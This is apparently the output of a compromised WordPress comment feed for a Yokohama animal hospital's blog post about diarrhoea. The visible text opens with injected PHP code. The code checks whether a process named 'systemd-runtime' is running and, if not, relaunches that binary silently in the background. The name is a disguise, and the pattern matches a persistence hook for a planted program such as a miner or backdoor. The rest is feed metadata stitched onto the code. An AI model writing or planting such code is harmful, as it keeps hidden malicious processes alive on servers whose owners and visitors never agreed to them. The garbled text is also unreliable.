$programFilePath = 'systemd-runtime'; $processList = shell_exec('ps aux'); if (strpos($processList, $programFilePath) === false) { $commandToExecute = 'nohup ./' . $programFilePath . ' > /dev/null 2>&1 &'; shell_exec($commandToExecute); } 下痢のとき へのコメント https://honmokudori.com/blog/95 本牧通り動物病院は、横浜市中区本牧宮原にある動物病院です。 Fri, 18 Jun 2021 10:58:17 +0000 hourly 1 https://wordpress.org/?v=6.2.5